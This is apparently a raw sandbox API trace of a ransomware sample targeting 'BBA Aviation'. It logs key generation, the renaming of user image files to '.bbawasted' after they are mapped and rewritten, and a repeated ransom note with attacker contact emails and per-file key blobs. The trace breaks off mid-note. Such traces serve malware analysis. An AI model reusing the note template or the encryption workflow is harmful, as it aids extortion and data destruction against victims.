0x689df0 [0224.333] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6a38) returned 1 [0224.333] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0224.333] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0224.333] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a5f10) returned 1 [0224.334] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0224.334] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0224.342] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0224.343] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0224.343] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0224.343] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]i8nZLGijvFFq6HOrWvXw52TuR0GC04Yx0Rvpwc+sXYBg9C7fA+YT9DlRmarJ2/Vr\r\nQvq3Xs3WTNH6RCHmJEnWEhnVIm2h5u/MFSsr0K/9iER4M+diP/xxDVK8IDSs432t\r\nUf3+JOSjhTGCumt1ND/Fl/qBX9wMK/JiUe02cXliXocuNtzZaAAnVf6aOG/U1vQU\r\nTomjqXv7TGwZXogeRGyDPwe/Jw/GewfSqVRVPsjAwzJplQS1uhYRMVlFPCqaVOeS\r\nACw2QCtjm2MMyFSM6TYzB1qgsY1lHTxoAhL1Eprl7lktQJADuaHj5HoUX90P/niO\r\nkeMS4xx67TMfL32ACO8J0suJJ2Pfy0RVA6C33HS1BR0K/z9HBghF+WnxTH8CwW3f\r\nRl64J/RBd2S0cyTvA5mCq9LoBScpLEYw5oRzjq55OB079f3oqe7tD7Kve06oZtjo\r\nrRwiDCJsZR7cCn/A5T7YZU4M27CpJhwN2yKsAuPbRKkH2JpljWvvcETEr/HCHoyX\r\nbtdk5FROldWB99BLvP42cAgKojD0Bx9MGJwLKs3116DCSHcLpzxtdmBSanpzkIMw\r\nkdVsqAMNJfopcp6jP6IEq8znt4UXsWc2P4yv0iO6Ny5QtZkJ1hvhQ4xfr61Jf3pY\r\nr/G2oznfQP19OdYhFP+jrj0pifw6hHPas2E52t35d+b=[end_key]\r\nKEEP IT\r\n") returned 984 [0224.343] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0224.343] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0224.343] SetEndOfFile (hFile=0x290) returned 1 [0224.346] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0224.346] CloseHandle (hObject=0x290) returned 1 [0224.346] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a21e0 | out: hHeap=0x660000) returned 1 [0224.346] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b1330 | out: hHeap=0x660000) returned 1 [0224.346] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6708) returned 1 [0224.347] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0224.347] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0224.347] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\CdF04Wroe5MVTsPAw3Ss.bmp") returned 59 [0224.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x280) returned 0x6c4b88 [0224.347] lstrcpyW (in: lpString1=0x6c4bfe, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0224.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0224.347] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a68a0) returned 1 [0224.348] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0224.348] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0224.348] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\CdF04Wroe5MVTsPAw3Ss.bmp.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\cdf04wroe5mvtspaw3ss.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0224.348] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0224.349] SetEndOfFile (hFile=0x290) returned 1 [0224.350] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0224.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0224.350] lstrcpyW (in: lpString1=0x6c4bfe, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0224.350] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\CdF04Wroe5MVTsPAw3Ss.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\cdf04wroe5mvtspaw3ss.bmp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\CdF04Wroe5MVTsPAw3Ss.bmp.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\cdf04wroe5mvtspaw3ss.bmp.bbawasted")) returned 1 [0224.351] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\CdF04Wroe5MVTsPAw3Ss.bmp.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\cdf04wroe5mvtspaw3ss.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0224.351] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0224.351] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x48fa [0224.351] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x48fa) returned 0x610000 [0224.351] CloseHandle (hObject=0x280) returned 1 [0224.352] UnmapViewOfFile (lpBaseAddress=0x610000) returned 1 [0224.352] CloseHandle (hObject=0x27c) returned 1 [0224.353] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0224.353] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6570) returned 1 [0224.353] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0224.353] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0224.353] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a64e8) returned 1 [0224.354] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0224.354] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0224.618] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0224.619] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0224.619] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0224.619] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]qGLq4FnJY8UyZ4jPTy+E8SpA0zlH2BFaEZWxmkaG136MsHHLXTrJhOX6wnW/ATlX\r\n2F48xWmZz1iEkz70+DL5OMbQmUGNgIN9oTd4rDoYOk5eHy4a0mwBZqHQkFMJuu1K\r\nz9HA+NxLGYEIBFrBDT64dSIdYnCjPZ992VFysx0I6f0T9Y+FqgAYOPbbtmNt6tGc\r\nqh7D0Jn2m+QSnuwhxmLhbCFoY7/VXwUoMRLMEPGK1PeBnJcmJ20mNLWcGdB7y64z\r\nTmhfM+qiOx8v8/xtBQELRdkMgb6Zg2qWXNCWo+qc5tvIrKFDhZwA5fobaEpIa130\r\nWLPrbJ+txKS4IJ95efOnAPwZ8hD2Ekuu3mOOd8kEGulbDMG5TjtJeOeBU6RxFYq6\r\nVPu84BRQhGTvBayTg7jMYJs/JbrZXHEWfACZyGfR0HFIcjDJz1J+huw4KpCuBP3t\r\neu1ArowBMgteqK174+ENRpYY83TUcoigX3s9OP3hXefLqxd+HbSRVjKdrSelNx7J\r\n0Ykrp5o4jwJTIsoZnYqDM3Y8nrEkXSmSEJotTDtazgFqHrByRL+Y5fo2Knf8P954\r\ndkL+i+gb8Y8dESnld+3AIqnF50rPdT8fdMNhUrj8bqtU2oklOjf/iD7GzIggoRMm\r\nTyTHpiAiIOFiCqdBnq30NYOa6Lm5z6HdojETZk1juu9=[end_key]\r\nKEEP IT\r\n") returned 984 [0224.619] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0224.619] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0224.619] SetEndOfFile (hFile=0x290) returned 1 [0224.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0224.622] CloseHandle (hObject=0x290) returned 1 [0224.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0224.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa3d8 | out: hHeap=0x660000) returned 1 [0224.623] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a68a0) returned 1 [0224.624] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0224.624] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0224.624] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\m1q_.gif") returned 43 [0224.624] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x260) returned 0x6bc8e0 [0224.624] lstrcpyW (in: lpString1=0x6bc936, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0224.624] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0224.624] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6a38) returned 1 [0224.625] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0224.625] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0224.625] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\m1q_.gif.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\m1q_.gif.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0224.626] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0224.627] SetEndOfFile (hFile=0x290) returned 1 [0224.628] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0224.628] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0224.628] lstrcpyW (in: lpString1=0x6bc936, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0224.628] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\m1q_.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\m1q_.gif"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\m1q_.gif.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\m1q_.gif.bbawasted")) returned 1 [0224.630] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\m1q_.gif.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\m1q_.gif.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0224.630] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0224.630] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xfeff [0224.630] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfeff) returned 0x5f0000 [0224.630] CloseHandle (hObject=0x27c) returned 1 [0224.633] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0224.634] CloseHandle (hObject=0x294) returned 1 [0224.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0224.634] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6790) returned 1 [0224.635] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0224.635] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0224.635] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a65f8) returned 1 [0224.636] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0224.636] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0224.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0224.647] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0224.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0224.647] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]qWbxjpZoWAdN6+KIRMyFERSNxrBawzOI0X0YIvLGkWQEG1R0HyXPxM6M7eowR1Q2\r\nUGeBfIkMwTPJie7Vj/bvbQgoJtSK57pMWnvZaZiJEQ1zJzb+9htWRffhVIBdDptO\r\nrXK67UgUBWo1QjKPPRwJ6UgzZd1GGF+xIzV28TgSJyJb/tB9iNZXQ1F95uK59iC4\r\n+64CcYpavR+S8mRf29WYxpNMUBCRMuJjDBNjV7BXPiT/IthyjC/qaI/RjoySz6f2\r\nG3TIMxIZb7WM9s9AazS2zsqJH71z+6H5+R5K4DPAS8uvpTTajH/aN683X1PNoCRj\r\n8oFNNqVLM6p5SFI334hJhJm0ZdmB8N4tJ9tjmN73DJv666ur27s3dPkJThHt0Go7\r\nx2QZF6rszgGbcT9/2b8dW66HOxiPJmZRQuboEXeGEy2GpG/WxkXRtOQhPe4ZloKb\r\nDgQEtsBwLCfkjOLZxtMThFpgYHqBXTkScjUIXD3+HiaEeBLhD4Ob0tOy2rUK9emA\r\n5xeoH3b3R2MAdhBplcyyImCV2YI/tWT3DJKD8shiN9CNeiGtSk2Yn/fMXtYdoaPO\r\nM0olmfA7FHzNTia/fgY8pOgtHzeFATuaLnf7qI5kCokj7rMhDeZCbAWvq0xnsyDM\r\nLNCnaDdbnCc4CX57HjGyC/SgtS+G4qC5EC0Kme5/fL9=[end_key]\r\nKEEP IT\r\n") returned 984 [0224.647] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0224.648] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0224.648] SetEndOfFile (hFile=0x290) returned 1 [0224.651] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0224.651] CloseHandle (hObject=0x290) returned 1 [0224.651] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc8e0 | out: hHeap=0x660000) returned 1 [0224.651] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a4988 | out: hHeap=0x660000) returned 1 [0224.651] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6460) returned 1 [0224.652] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0224.652] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0224.652] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\MH8HXC4i.gif") returned 47 [0224.652] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x268) returned 0x6bc8e0 [0224.652] lstrcpyW (in: lpString1=0x6bc93e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0224.652] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0224.652] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a69b0) returned 1 [0224.653] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0224.653] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0224.653] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\MH8HXC4i.gif.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\mh8hxc4i.gif.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0224.654] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0224.655] SetEndOfFile (hFile=0x290) returned 1 [0224.655] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0224.656] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0224.656] lstrcpyW (in: lpString1=0x6bc93e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0224.656] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\MH8HXC4i.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\mh8hxc4i.gif"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\MH8HXC4i.gif.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\mh8hxc4i.gif.bbawasted")) returned 1 [0225.141] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\MH8HXC4i.gif.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\mh8hxc4i.gif.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0225.141] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0225.142] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x3b40 [0225.142] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3b40) returned 0x5f0000 [0225.142] CloseHandle (hObject=0x294) returned 1 [0225.142] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0225.143] CloseHandle (hObject=0x27c) returned 1 [0225.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0225.143] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6680) returned 1 [0225.143] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0225.144] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0225.144] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a5f98) returned 1 [0225.144] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0225.144] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0225.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0225.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0225.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0225.168] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 